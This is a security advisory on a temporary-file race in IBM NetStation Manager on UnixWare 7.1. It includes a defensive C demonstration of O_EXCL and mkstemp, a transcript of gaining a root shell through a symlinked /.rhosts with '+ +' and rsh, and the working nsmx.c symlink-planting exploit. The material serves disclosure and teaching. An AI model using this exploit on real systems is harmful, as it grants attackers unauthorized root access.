[IT168 News]
Affected systems:
NetStation on UnixWare 7.1
Description:
IBM Network Station Manager contains a vulnerability that lets a local user obtain root privileges.
When NetStation creates a temporary file it does not use a secure mktemp-style routine; it simply appends the current time in seconds to a known file name, which makes the name predictable and the creation a race condition. For a daemon running as nobody or a similarly unprivileged account this would matter little, but NetStation has to run as root, so it has permission to open and modify any file on the system. A local attacker can pre-create symbolic links from the predictable xnec.nsu<seconds> names to /.rhosts, so that NetStation creates /.rhosts on the attacker's behalf, and from there obtain root.
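The following is an added example that is not part of the original advisory or of NetStation's own code. It reproduces the "known prefix + time(0)" naming pattern the description criticises, plants symlinks for the next thirty seconds the way the exploit does, and then shows which open() variants hand the privileged write to the attacker's target: a plain O_CREAT|O_TRUNC open follows the planted link, while O_CREAT|O_EXCL|O_NOFOLLOW refuses it, and mkstemp() avoids the predictable name altogether. Everything runs as the current user under a scratch directory it creates beneath /tmp; the file rhosts_target is a stand-in for /.rhosts, and all paths are assumptions made for the demonstration.

```c
/* Added example (not from the advisory): predictable temp-file race vs. O_EXCL/mkstemp. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* The vulnerable pattern: name = base + seconds since the epoch.
 * Anyone who can read the clock knows every name for the next N seconds. */
static int predictable_name(char *out, size_t n, const char *base, time_t t) {
    int w = snprintf(out, n, "%s%ld", base, (long)t);
    return (w > 0 && (size_t)w < n) ? 0 : -1;
}

/* What a root daemon typically does to "create" its temp file: this follows
 * a pre-planted symlink and creates/truncates whatever it points at. */
static int open_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened create: O_EXCL fails if any directory entry (symlink included)
 * already exists; O_NOFOLLOW additionally refuses to follow a symlink at the
 * final component. Fails with EEXIST or ELOOP when a link has been planted. */
static int open_secure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* mkstemp() replaces XXXXXX with an unpredictable suffix and creates the file
 * with O_EXCL in one step, so a guessed name is never reached. Returns 1 when
 * the suffix was replaced and the descriptor refers to a fresh regular file. */
static int mkstemp_demo(void) {
    char tmpl[] = "/tmp/nsmx_safe_XXXXXX";   /* assumed scratch location */
    int fd = mkstemp(tmpl);
    if (fd < 0) return 0;
    struct stat st;
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_size == 0
             && strcmp(tmpl + strlen(tmpl) - 6, "XXXXXX") != 0;
    close(fd);
    unlink(tmpl);
    return ok;
}

/* Stage the attacker's links in a private scratch dir (stand-in for
 * /usr/netstation/nsm/users/xnec), then play the daemon's side.
 * Returns 1 if the insecure open followed the link AND the secure open
 * refused it; 0 otherwise; -1 if the scratch dir could not be set up. */
static int demo_race(void) {
    char dir[] = "/tmp/nsmx_demo_XXXXXX";
    if (!mkdtemp(dir)) return -1;
    char base[256], victim[256], planted[256];
    snprintf(base, sizeof base, "%s/xnec.nsu", dir);
    snprintf(victim, sizeof victim, "%s/rhosts_target", dir); /* stands in for /.rhosts */
    time_t t = time(NULL);

    /* attacker: one symlink per second for the next thirty seconds, as nsmx.c does */
    for (int i = 0; i < 30; i++) {
        if (predictable_name(planted, sizeof planted, base, t + i) == 0
            && symlink(victim, planted) != 0)
            return -1;
    }

    /* daemon: "creates" its temp file under the name it computes one second later */
    predictable_name(planted, sizeof planted, base, t + 1);
    int fd_bad = open_insecure(planted);
    int followed = (fd_bad >= 0) && (access(victim, F_OK) == 0); /* victim now exists */
    if (fd_bad >= 0) close(fd_bad);

    int fd_good = open_secure(planted);
    int refused = (fd_good < 0) && (errno == EEXIST || errno == ELOOP);
    if (fd_good >= 0) close(fd_good);

    /* clean up the scratch directory */
    for (int i = 0; i < 30; i++) {
        if (predictable_name(planted, sizeof planted, base, t + i) == 0)
            unlink(planted);
    }
    unlink(victim);
    rmdir(dir);
    return followed && refused;
}

int main(void) {
    printf("insecure open followed link, secure open refused: %d\n", demo_race());
    printf("mkstemp created an unpredictable, fresh file:      %d\n", mkstemp_demo());
    return 0;
}
```

The point to carry over to a real fix is that neither a "random enough" suffix nor O_EXCL alone is sufficient on its own: the name must be unguessable and the create must be atomic (mkstemp gives both), and a daemon that must create files in a directory writable by less privileged users should also drop privileges or use O_NOFOLLOW so a planted link is an error rather than a root-owned write.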
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory
<connect to http://localhost:880 and log in>
Workstation>
bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx
<click "Workstation" again>
bash-2.02$ ls -la /.rhosts
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -i
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)
,10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#

/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
 * Exploits a temporary file race condition in NetStation's HTTP interface
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths. Don't worry if .nsu doesn't exist, NS will
 * create it for you. Next, point your browser at
 * http://localhost:880 and login as a normal user. Click on "Hardware"
 * Then "workstation". This will create /users/xnec.
 * Next, compile and run this program. You only have thirty seconds from
 * the time you complete this step to then click on "Workstation". When
 * this is done, you should have an /.rhosts which you own. On some
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier@usa.net
 *
 */
/* The header names were lost from the page (eaten as HTML tags); these are the ones the code needs. */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    /* Change these paths */
    char dest[20] = "/.rhosts";                                    /* file root will create for us */
    char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";  /* NetStation's temp-file prefix */
    char sourcesym[64];                                            /* prefix + seconds since the epoch */
    long sec;
    int i;

    /* NetStation names its temp file <prefix><time(0)>. Plant a symlink for
     * each of the next thirty seconds so that whichever name it picks when
     * "Workstation" is clicked already points at /.rhosts. */
    sec = (long)time(0);
    for (i = 0; i < 30; i++) {
        snprintf(sourcesym, sizeof sourcesym, "%s%ld", source, sec + i);
        symlink(dest, sourcesym);
    }
    return 0;
}

Recommendation:
None available at the time of writing.